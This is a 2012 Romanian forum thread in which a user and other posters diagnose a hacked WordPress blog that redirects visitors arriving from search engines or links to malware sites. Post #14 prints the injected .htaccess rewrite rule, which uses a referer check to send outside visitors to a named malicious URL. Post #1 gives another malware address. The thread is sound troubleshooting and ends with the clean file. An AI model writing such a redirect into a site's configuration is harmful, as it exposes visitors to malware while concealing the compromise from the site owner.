Blog virusat - soluții ?
Last Updated: Nov 27 2012 14:29, Started by
LunaCrystal
, Nov 26 2012 13:30
·
0
#1
Posted 26 November 2012 - 13:30
Am o problemă cu un blog, și anume dacă tastez direct adresa in bara de adrese, adică in xxxx .ro blogul funcționează normal. Însă dacă intru pe blog prin intermediul unui link de pe google/alte site-uri mă redirecționează la diverse adrese cu viruși/troieni. Una din adrese e și aceasta: http://old.bip.warszawa.rio. gov. pl/hmod.htm (am lăsat spațiu pentru a nu se da click accidental pe ea). Am făcut upgrade la script și la baza de date la ultima versiune, am căutat în baza de date și în fișierele scriptului după adresele la care se face redirecționarea nedorită, însă nu am găsit nimic. Probabil e un injecțion code cryptat fie în script fie în baza de date. Aveți vreo idee despre ce aș mai putea face pentru repararea blogului ? Platforma este wordpress.
Scuze dacă se mai discută undeva, dar nu am găsit nimic, nici pe google despre această problemă. |
#3
Posted 26 November 2012 - 13:51
Să fie hostul de vină ? Am uitat să fac 2 precizări:
1. Upgrade-ul la ultima versiune l-am făcut automat din Fantastico 2. Dacă schimb permisiunea folderului în care se află blogul şi şterg dreptul de a se citii fişierele atunci apare eroarea ,,forbiden" indiferent dacă accesez blogul direct sau prin intermediul unui link. |
#5
Posted 26 November 2012 - 15:14
LunaCrystal, on 26 noiembrie 2012 - 13:51, said:
Să fie hostul de vină ? Am uitat să fac 2 precizări: 1. Upgrade-ul la ultima versiune l-am făcut automat din Fantastico 2. Dacă schimb permisiunea folderului în care se află blogul şi şterg dreptul de a se citii fişierele atunci apare eroarea ,,forbiden" indiferent dacă accesez blogul direct sau prin intermediul unui link. 1. nimic incorect 2. nu este legat de permisiuni (chmod) cat de faptul ca ai un 'inject' facut in index,php sau header.php (tema). Editeaza/vizualizeaza codul si cauta anomaliile. La fel de bine poate fi si de la un plugin asa cum a precizat Lensflare |
#6
Posted 26 November 2012 - 18:46
Nu am gasit nimic suspect. Cred ca ma apuc sa schimb toate fisierele.
|
#7
Posted 26 November 2012 - 18:51
Am impresia ca ai pe undeva inserat un redirect pt. IP-urile crawlerilor de la Google.
Wordpress are o gramada de vulnerabilitati, probabil platforma asta o folosesti acum. |
#8
Posted 26 November 2012 - 19:10
Da, aşa cum am mai scris e vorba de wordpress. Dacă e aşa trebuie să se rezolve cu înlocuirea tuturor fişierelor.
|
#9
Posted 26 November 2012 - 19:14
Daca ai codul injectat in baza de date, nu rezolvi nimic cu inlocuirea fisierelor.
In cel mai fericit caz il poti gasi usor daca vei gasi pur si simplu una din adresele pe care le-ai gasit indexate in google. Altfel este vorba despre un alt site care genereaza automat si probabil aleator acele URL-uri si iti va fi mai greu sa le gasesti. Poate te ajuta ce am primit eu recent de la firma de la care am hosting. Nu folosesc Wordpress. Quote
Buna ziua, Din cauza numeroaselor probleme de vulnerabilitate pe care platforma Wordpress le are in acest moment si a deselor atacuri asupra acestui CMS, recomandam tuturor clientilor Claus Web instalarea a trei pluginuri care vor creste securitatea contului dumneavoastra si va vor proteja pe viitor. Pentru oricare din aceste pluginuri este necesar sa va logati la contul dumneavoastra de WP-admin, sa navigati la meniul Plugins si sa selectati optiunea Add New/Adauga. Timthumb Vulnerability –verifica automat si periodic siteul dumenavoastra pentru semne clare de compromitere. BulletProof Security –protejeaza siteul dumneavoastra impotriva unei multimi de atacuri (XSS, RFI, CRLF, CSRF, Base64, Code Injection si SQL). Dupa ce ati instalat pluginul, va rugam sa navigati la meniul BPS Security proaspat creat si folositi optiunea de Create secure .htaccess File si dati click pe OK. Dupa aceea, mai jos pe pagina de setare a pluginului este nevoie de setati BulletProof Mode pentru toate optiunile afisate. Atentie! Acestea nu dispar dupa setare. Wordfence – este poate cel mai important plugin de securitate. Dupa instalare, este nevoie sa intrati in meniul acestui plugin, situat in subsolul meniul-coloana din stanga, si sa faceti o scanare a site-ului folosind optiunea Start a Wordfence Scan. Dupa scanare, va fi afisat un raport privind securitatea sistemului dumneavoastra, fisiere corupte sau suspecte, precum si alte vulnerabilitati. cu respect, Echipa Claus Web 0729817447 0261758080 -------------------------------------------------------------------------------- Pentru dezabonare de la acest newsletter Click Aici Edited by gumball3000, 26 November 2012 - 19:15. |
#10
Posted 26 November 2012 - 19:41
Aţi avut dreptate, virusu e în baza de date. Dar nu ştiu unde încă.
|
|
#11
Posted 26 November 2012 - 21:35
Poti sa exporti baza de date, si sa cauti in ea cu un editor de texte, recomand Notepad ++.
Pe google este indexat link-ul tau, dar te redirectioneaza spre site-ul dubios sau apar fragmente de text din site-ul tau, insa cu link catre un site dubios (fara redirect)? |
#12
Posted 27 November 2012 - 10:11
Da, redirecţionează către site-uri dubioase în mod aleatoriu. Totuşi nu sunt sigur 100 % că nu sunt (şi) fişierele infectate. Şi încă o precizare, nu doar de pe link-urile de pe google mă redirecţionează către site-uri dubioase, ci şi de pe alte link-uri. Uite, ăsta e blogul problemă: http://inproba.ro se observă că şi de pe softpedia când dai click redirecţionează la site-uri problemă. Însă dacă tastezo manual adresa în bara de adrese nu.
Edited by LunaCrystal, 27 November 2012 - 10:12. |
#13
Posted 27 November 2012 - 10:41
Da, ai pus pe undeva un redirect la urmeazanumelemeudespammerprost, din cauza asta daca tastezi manual in bara de adrese nu te redirectioneaza.
CU plugin-urile de le-am postat mai sus nu ai reusit nimic? in fisierul .htaccess ai ceva scris? sau nici nu exista? |
#14
Posted 27 November 2012 - 12:29
Nu am instalat pluginuri de nici un fel. Iată însă ce am găsit in .htaccess
<IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+) RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC] RewriteRule ^.*$ http://arklateximports.com/hmod.html [L,R] </IfModule> # BEGIN WordPress <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> # END WordPress Am şters acest fişier, acum merge pagina de start oricum ar fi acesată, însă nu şi link-urile către articole, chiar dacă sunt acesate prin intermediul paginii de start. Am impresia că e necesar fişierul .htaccess doar că trebuie şterse nişte linii de cod din el, mă apuc să îl refac. |
#15
Posted 27 November 2012 - 13:52
Lasa doar asta in .htaccess:
# BEGIN WordPress <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> # END WordPress |
|
Anunturi
Bun venit pe Forumul Softpedia!
▶ 0 user(s) are reading this topic
0 members, 0 guests, 0 anonymous users